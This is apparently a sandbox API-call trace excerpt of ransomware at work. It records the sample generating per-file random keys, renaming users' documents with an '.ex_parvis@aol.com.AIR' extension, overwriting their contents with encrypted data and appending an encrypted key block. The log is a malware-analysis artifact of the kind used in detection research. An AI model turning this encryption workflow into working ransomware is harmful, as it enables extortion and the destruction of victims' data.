dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.017] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx", dwFileAttributes=0x80) returned 1 [0161.018] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx") returned 64 [0161.018] GetProcessHeap () returned 0x2e0000 [0161.018] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3a7428 [0161.018] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx" [0161.018] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.018] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bs2qpetu27xrxffvx4.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bs2qpetu27xrxffvx4.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.020] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bs2QPeTU27XrxffvX4.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bs2qpetu27xrxffvx4.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.020] GetProcessHeap () returned 0x2e0000 [0161.020] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.020] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=22228) returned 1 [0161.020] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x56d4 [0161.020] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.020] GetProcessHeap () returned 0x2e0000 [0161.020] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.020] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.020] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.021] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.021] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.021] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0x56d4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0x56d4, lpOverlapped=0x0) returned 1 [0161.022] SetFilePointer (in: hFile=0x394, lDistanceToMove=-22228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.022] WriteFile (in: hFile=0x394, lpBuffer=0x3b3af0*, nNumberOfBytesToWrite=0x56d4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3af0*, lpNumberOfBytesWritten=0x2acf9c8*=0x56d4, lpOverlapped=0x0) returned 1 [0161.023] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.023] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.023] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt", dwFileAttributes=0x80) returned 1 [0161.023] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt") returned 65 [0161.023] GetProcessHeap () returned 0x2e0000 [0161.023] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe8) returned 0x3a7428 [0161.023] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt" [0161.024] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt.12781717671972518758.ex_parvis@aol.com.AIR" [0161.024] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5i9nrfoufqa0kblvywwu.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5i9nrfoufqa0kblvywwu.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.026] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5i9nrfOUFqA0KBlVyWWU.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5i9nrfoufqa0kblvywwu.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.026] GetProcessHeap () returned 0x2e0000 [0161.026] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.026] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=81502) returned 1 [0161.026] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x13e5e [0161.026] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.026] GetProcessHeap () returned 0x2e0000 [0161.026] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.026] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.027] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.027] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.027] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.028] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0x13e5e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0x13e5e, lpOverlapped=0x0) returned 1 [0161.030] SetFilePointer (in: hFile=0x394, lDistanceToMove=-81502, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.031] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x13e5e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x13e5e, lpOverlapped=0x0) returned 1 [0161.031] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.031] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.031] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls", dwFileAttributes=0x80) returned 1 [0161.031] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls") returned 60 [0161.031] GetProcessHeap () returned 0x2e0000 [0161.031] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0161.031] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls" [0161.031] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls.12781717671972518758.ex_parvis@aol.com.AIR" [0161.031] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2hubqqfglqjkstu.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2hubqqfglqjkstu.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.041] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2HUBqQFglQJkSTU.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2hubqqfglqjkstu.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.041] GetProcessHeap () returned 0x2e0000 [0161.041] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.041] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=15159) returned 1 [0161.041] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3b37 [0161.041] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.041] GetProcessHeap () returned 0x2e0000 [0161.041] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.041] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.042] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.042] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.043] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.043] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0x3b37, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0x3b37, lpOverlapped=0x0) returned 1 [0161.043] SetFilePointer (in: hFile=0x394, lDistanceToMove=-15159, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.043] WriteFile (in: hFile=0x394, lpBuffer=0x3b1f50*, nNumberOfBytesToWrite=0x3b37, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b1f50*, lpNumberOfBytesWritten=0x2acf9c8*=0x3b37, lpOverlapped=0x0) returned 1 [0161.044] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.044] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.045] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx", dwFileAttributes=0x80) returned 1 [0161.045] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx") returned 60 [0161.045] GetProcessHeap () returned 0x2e0000 [0161.045] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0161.045] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx" [0161.045] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.045] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0z_9gsjmsc16pu.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0z_9gsjmsc16pu.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.049] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0z_9GsJMSC16Pu.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0z_9gsjmsc16pu.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.049] GetProcessHeap () returned 0x2e0000 [0161.049] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.049] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=44268) returned 1 [0161.049] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xacec [0161.049] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.049] GetProcessHeap () returned 0x2e0000 [0161.049] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.049] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.050] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.051] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.051] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0xacec, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0xacec, lpOverlapped=0x0) returned 1 [0161.052] SetFilePointer (in: hFile=0x394, lDistanceToMove=-44268, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.052] WriteFile (in: hFile=0x394, lpBuffer=0x3b9108*, nNumberOfBytesToWrite=0xacec, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b9108*, lpNumberOfBytesWritten=0x2acf9c8*=0xacec, lpOverlapped=0x0) returned 1 [0161.052] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.052] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.053] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx", dwFileAttributes=0x80) returned 1 [0161.053] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx") returned 57 [0161.053] GetProcessHeap () returned 0x2e0000 [0161.053] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.053] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx" [0161.053] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.053] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0wrmcpbzwac.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0wrmcpbzwac.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.055] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0WRMCpBzWaC.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0wrmcpbzwac.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.055] GetProcessHeap () returned 0x2e0000 [0161.055] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.055] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=59391) returned 1 [0161.055] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe7ff [0161.055] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.055] GetProcessHeap () returned 0x2e0000 [0161.055] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.055] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.056] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.056] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.056] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.057] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0xe7ff, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0xe7ff, lpOverlapped=0x0) returned 1 [0161.058] SetFilePointer (in: hFile=0x394, lDistanceToMove=-59391, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.058] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0xe7ff, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xe7ff, lpOverlapped=0x0) returned 1 [0161.061] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.061] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.061] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx", dwFileAttributes=0x80) returned 1 [0161.061] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx") returned 65 [0161.061] GetProcessHeap () returned 0x2e0000 [0161.061] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe8) returned 0x3a7428 [0161.061] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS 